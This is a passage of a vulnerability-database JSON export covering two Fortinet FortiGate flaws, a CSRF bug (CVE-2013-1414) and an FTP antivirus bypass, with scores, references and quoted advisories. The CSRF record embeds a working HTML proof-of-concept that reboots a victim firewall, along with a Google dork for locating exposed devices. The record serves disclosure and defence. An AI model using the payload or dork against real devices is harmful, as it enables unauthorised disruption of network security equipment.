"cpe22Uri": "cpe:/h:fortinet:fortigate-3810a",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-3950b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-40c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5001a-sw",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5001b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5020",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5060",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-50b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5101c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-5140b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-600c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-60c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-620b",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-800c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-80c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:fortinet:fortigate-voice-80c",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fortinet:fortios",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sven Wurth",
"sources": [
{
"db": "BID",
"id": "60861"
},
{
"db": "PACKETSTORM",
"id": "122216"
}
],
"trust": 0.4
},
"cve": "CVE-2013-1414",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "CVE-2013-1414",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "VHN-61416",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-1414",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-1414",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201307-116",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-61416",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown. (1) Change settings (2) Policy changes (3) Reboot device. FortiGate running FortiOS is prone to a cross-site request-forgery vulnerability. \nExploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the device running the affected application. Other attacks are also possible. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Vulnerability ID: CVE-2013-1414\nVulnerability Type: CSRF (Cross-Site Request Forgery)\nProduct: All Fortigate Firewalls\nVendor: Fortinet http://www.fortinet.com\nVulnerable Version: \u003c 4.3.13 \u0026 \u003c 5.0.2\n \nDescription\n==========\nBecause many functions are not protected by CSRF-Tokens, it\u0027s possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall. \n \nRequirements\n===========\nAn Attacker needs to know the IP of the device. \nAn Administrator needs an authenticated connection to the device. \n \n \nReport-Timeline:\n================\nVendor Notification: 11 July 2012\nVendor released version 5.0.2 / 18 March 2013\nVendor released version 4.3.13 / 29 April 2013\nStatus: Fixed\n \nGoogle Dork:\n==========\n -english -help -printing -companies -archive -wizard -pastebin -adult -keywords \"Warning: this page requires Javascript. To correctly view, please enable it in your browser\"\n \n \nCredit:\n=====\nSven Wurth dos@net-war.de\n \n \nPoC\n====\n \nThis Example will reboot a Fortinet Firewall. \nThis is just one of many possibilities to attack this vulnerability. \n \n##### CSRF - Proof Of Concept ####\n\u003chtml\u003e\n\u003cbody onload=\"submitForm()\"\u003e\n\u003cform name=\"myForm\" id=\"myForm\"\n action=\"https://###_VICTIM_IP_###/system/maintenance/shutdown\" method=\"post\"\u003e\n \u003cinput type=\"hidden\" name=\"reason\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"action\" value=\"1\"\u003e\n \u003cinput type=\"submit\" name=\"add\" value=\"rebootme\"\u003e\n\u003c/form\u003e\n\u003cscript type=\u0027text/javascript\u0027\u003edocument.myForm.submit();\u003c/script\u003e\n\u003c/html\u003e\n##### End Poc #####\n \n \n \n \n \n \n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-1414"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "BID",
"id": "60861"
},
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "PACKETSTORM",
"id": "122216"
}
],
"trust": 2.07
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-61416",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-1414",
"trust": 2.9
},
{
"db": "EXPLOIT-DB",
"id": "26528",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116",
"trust": 0.7
},
{
"db": "BID",
"id": "60861",
"trust": 0.4
},
{
"db": "PACKETSTORM",
"id": "122216",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-80159",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-61416",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "BID",
"id": "60861"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "PACKETSTORM",
"id": "122216"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"id": "VAR-201307-0030",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-11T23:05:36.424000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FortiGate\u30a2\u30d7\u30e9\u30a4\u30a2\u30f3\u30b9",
"trust": 0.8,
"url": "http://www.fortinet.co.jp/products/fortigate/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/26528/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1414"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-1414"
},
{
"trust": 0.3,
"url": "https://www.fortinet.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1414"
},
{
"trust": 0.1,
"url": "http://www.fortinet.com"
},
{
"trust": 0.1,
"url": "https://###_victim_ip_###/system/maintenance/shutdown\""
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "BID",
"id": "60861"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "PACKETSTORM",
"id": "122216"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-61416"
},
{
"db": "BID",
"id": "60861"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"db": "PACKETSTORM",
"id": "122216"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-07-08T00:00:00",
"db": "VULHUB",
"id": "VHN-61416"
},
{
"date": "2013-06-28T00:00:00",
"db": "BID",
"id": "60861"
},
{
"date": "2013-07-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"date": "2013-06-28T22:13:39",
"db": "PACKETSTORM",
"id": "122216"
},
{
"date": "2013-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"date": "2013-07-08T17:55:02.783000",
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-07-08T00:00:00",
"db": "VULHUB",
"id": "VHN-61416"
},
{
"date": "2013-06-28T00:00:00",
"db": "BID",
"id": "60861"
},
{
"date": "2013-07-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-003232"
},
{
"date": "2013-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-116"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-1414"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Fortinet FortiGate Runs on the device FortiOS Vulnerable to cross-site request forgery",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003232"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-116"
}
],
"trust": 0.6
}
}
VAR-200512-0013
Vulnerability from variot - Updated: 2025-04-03 22:10The FTP component in FortiGate 2.8 running FortiOS 2.8MR10 and v3beta, and other versions before 3.0 MR1, allows remote attackers to bypass the Fortinet FTP anti-virus engine by sending a STOR command and uploading a file before the FTP server response has been sent, as demonstrated using LFTP. Fortinet FortiGate is reportedly prone to a vulnerability that allows an attacker to bypass antivirus protection. This issue is said to occur when files are transferred using the FTP protocol under certain conditions. FortiGate devices running FortiOS v2.8MR10 and v3beta are affected by this issue. Other versions may also be vulnerable. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration. The FTP component of Fortinet FortiGate cannot properly filter and check files.
TITLE: FortiGate URL Filter and Virus Scanning Bypass Vulnerabilities
SECUNIA ADVISORY ID: SA18844
VERIFY ADVISORY: http://secunia.com/advisories/18844/
CRITICAL: Less critical
IMPACT: Security Bypass
WHERE:
From local network
OPERATING SYSTEM: Fortinet FortiOS (FortiGate) 2.x http://secunia.com/product/2289/ Fortinet FortiOS (FortiGate) 3.x http://secunia.com/product/6802/
DESCRIPTION: Mathieu Dessus has reported two vulnerabilities in FortiGate, which can be exploited by malicious people and users to bypass certain security restrictions.
1) The URL blocking functionality can be bypassed by specially-crafted HTTP requests that are terminated by the CR character instead of the CRLF characters. It is also possible to bypass the functionality via a HTTP/1.0 request with no host header.
The vulnerability has been reported in FortiOS v2.8MR10 and v3beta.
The vulnerability has been reported in FortiOS v2.8MR10 and v3beta.
SOLUTION: Do not rely on URL blocking as the only means of blocking users' access. Desktop-based on-access virus scanners should be used together with server-based virus scanners.
PROVIDED AND/OR DISCOVERED BY: Mathieu Dessus
ORIGINAL ADVISORY: http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042139.html http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042140.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200512-0013",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fortigate",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": "2.8"
},
{
"model": "fortios",
"scope": "lte",
"trust": 1.0,
"vendor": "fortinet",
"version": "2.8_mr10"
},
{
"model": "fortios",
"scope": "lte",
"trust": 1.0,
"vendor": "fortinet",
"version": "3_beta"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.6,
"vendor": "fortinet",
"version": "2.8_mr10"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.6,
"vendor": "fortinet",
"version": "3_beta"
},
{
"model": "fortios beta",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3.0"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "3.0"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.80"
},
{
"model": "fortios mr5",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.50"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.50"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.36"
},
{
"model": "fortios mr10",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.8"
},
{
"model": "fortios 0mr4",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.5"
},
{
"model": "fortios mr12",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.80"
},
{
"model": "fortios mr1",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "3.0"
}
],
"sources": [
{
"db": "BID",
"id": "16597"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-986"
},
{
"db": "NVD",
"id": "CVE-2005-3057"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mathieu Dessus mdessus@gmail.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200512-986"
}
],
"trust": 0.6
},
"cve": "CVE-2005-3057",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2005-3057",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-14266",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2005-3057",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200512-986",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-14266",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14266"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-986"
},
{
"db": "NVD",
"id": "CVE-2005-3057"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The FTP component in FortiGate 2.8 running FortiOS 2.8MR10 and v3beta, and other versions before 3.0 MR1, allows remote attackers to bypass the Fortinet FTP anti-virus engine by sending a STOR command and uploading a file before the FTP server response has been sent, as demonstrated using LFTP. Fortinet FortiGate is reportedly prone to a vulnerability that allows an attacker to bypass antivirus protection. This issue is said to occur when files are transferred using the FTP protocol under certain conditions. \nFortiGate devices running FortiOS v2.8MR10 and v3beta are affected by this issue. Other versions may also be vulnerable. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration. The FTP component of Fortinet FortiGate cannot properly filter and check files. \n\nTITLE:\nFortiGate URL Filter and Virus Scanning Bypass Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA18844\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/18844/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nSecurity Bypass\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nFortinet FortiOS (FortiGate) 2.x\nhttp://secunia.com/product/2289/\nFortinet FortiOS (FortiGate) 3.x\nhttp://secunia.com/product/6802/\n\nDESCRIPTION:\nMathieu Dessus has reported two vulnerabilities in FortiGate, which\ncan be exploited by malicious people and users to bypass certain\nsecurity restrictions. \n\n1) The URL blocking functionality can be bypassed by\nspecially-crafted HTTP requests that are terminated by the CR\ncharacter instead of the CRLF characters. It is also possible to\nbypass the functionality via a HTTP/1.0 request with no host header. \n\nThe vulnerability has been reported in FortiOS v2.8MR10 and v3beta. \n\nThe vulnerability has been reported in FortiOS v2.8MR10 and v3beta. \n\nSOLUTION:\nDo not rely on URL blocking as the only means of blocking users\u0027\naccess. Desktop-based on-access virus scanners should be used\ntogether with server-based virus scanners. \n\nPROVIDED AND/OR DISCOVERED BY:\nMathieu Dessus\n\nORIGINAL ADVISORY:\nhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042139.html\nhttp://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042140.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-3057"
},
{
"db": "BID",
"id": "16597"
},
{
"db": "VULHUB",
"id": "VHN-14266"
},
{
"db": "PACKETSTORM",
"id": "43767"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "16597",
"trust": 2.0
},
{
"db": "NVD",
"id": "CVE-2005-3057",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "18844",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2006-0539",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200512-986",
"trust": 0.7
},
{
"db": "FULLDISC",
"id": "20060213 BYPASS FORTINET ANTI-VIRUS USING FTP",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20060213 BYPASS FORTINET ANTI-VIRUS USING FTP",
"trust": 0.6
},
{
"db": "XF",
"id": "24624",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "8485",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-14266",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "43767",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14266"
},
{
"db": "BID",
"id": "16597"
},
{
"db": "PACKETSTORM",
"id": "43767"
},
{
"db": "CNNVD",
"id": "CNNVD-200512-986"
},
{
"db": "NVD",
"id": "CVE-2005-3057"
}
]
},
"id": "VAR-200512-0013",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14266"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-03T22:10:47.941000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-3057"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-february/042139.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/16597"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/18844"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=113986337408103\u0026w=2"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2006/0539"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24624"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/24624"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2006/0539"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/8485"
},
{
"trust": 0.3,
"url": "http://fortinet.com/fortiguardcenter/ftp_vuln.html"
},
{
"trust": 0.3,
"url": "http://www.fortinet.com/"
},
{
"trust": 0.3,
"url": "/archive/1/424857"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=113986337408103\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/6802/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-february/042140.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/18844/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/2289/"
}
